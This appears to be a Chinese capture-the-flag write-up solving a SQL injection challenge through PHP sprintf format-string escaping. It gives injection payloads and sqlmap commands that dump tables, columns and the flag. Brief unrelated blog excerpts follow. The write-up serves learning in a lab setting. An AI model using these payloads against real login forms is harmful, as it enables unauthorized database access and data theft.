開啟連線,出現乙個登入框:
嘗試:掃目錄、弱口令、源**都沒有什麼發現
題目為sqli 猜測sql注入應該在登入處,轉包丟sqlmap先跑一發,也沒有結果。
嘗試手工測一下,發現在使用者名稱處輸入%時居然有報錯!
看報錯提示,有sprintf()錯誤,瞬間想起了這個函式有格式化字串漏洞,抓包嘗試一番。
sprintf注入,或者說php格式化字串注入的原理為:
要明白%後的乙個字元(除了%,%上面**已經給出了)都會被當作字元型型別而被吃掉,也就是被當作乙個型別進行匹配後面的變數,比如%c匹配ascii碼,%d匹配整數,如果不在定義的也會匹配,匹配空,比如%\,這樣我們的目的只有乙個,使得單引號逃逸,也就是能夠起到閉合的作用。
構造payload:
username=admin%1$\' or 1=1#
username=admin%1$\' or 1=2#
若第乙個提示password error,第二個提示username error則說明此處存在注入。
新增sqlmap新增字首的引數:–prefix="%1$』"繼續跑
爆資料庫
爆表
sqlmap -r'/root/desktop/222/dsaf.txt' --prefix="%1$\'" -p username --tables -d"ctf"
爆欄位
sqlmap -r'/root/desktop/222/dsaf.txt' --prefix="%1$\'" -p username --columns -t"flag" -d"ctf" --dump
flag成功拿到flag~
迎聖誕,拿大獎 流量分析 Writeup分享
太菜了太菜了,剛見到js 時竟然不知道什麼東西,自己都不敢說自己做過實驗吧上的那道js 題了。進入正題 首先解壓發現兩個檔案,乙個流量分析包,哇哇哇,我正好剛學了幾天wireshark工具使用,正好練練手 第二個檔案是這個secret.log,不管啥,先放入winhex裡邊看看 果然中間有一段十六進...
聖誕前夜 感悟
其實今天的主題並不是聖誕節,而是其他的一些事情,我們是生活在乙個群體中,時時刻刻都和周圍的人進行著互動,就想程式一樣,每個人都是乙個物件,物件間的資訊交換就是人與人的一些資訊互動過程,不過人們之間的資訊互動沒有程式那樣簡單 直接。我們在資訊互動的時候都蒙上了一層面紗。讓人們之間的互動變得不可捉摸簡單...
迎評創優活動
主題 迎評創優活動 2007年3 月14日星期三 今天晚上冒雨去學院開班會,我的一些同學都很不願意去開這次班會,因為他們覺得開班會總是不會有好事情。肯定又是要索取班費,搞活動或者是選優等等之類的閒事。我們有一大部分的人都很不願意開班費,總覺得是浪費時間與金錢。並且這天的課程有很多,特別是有體育課 很...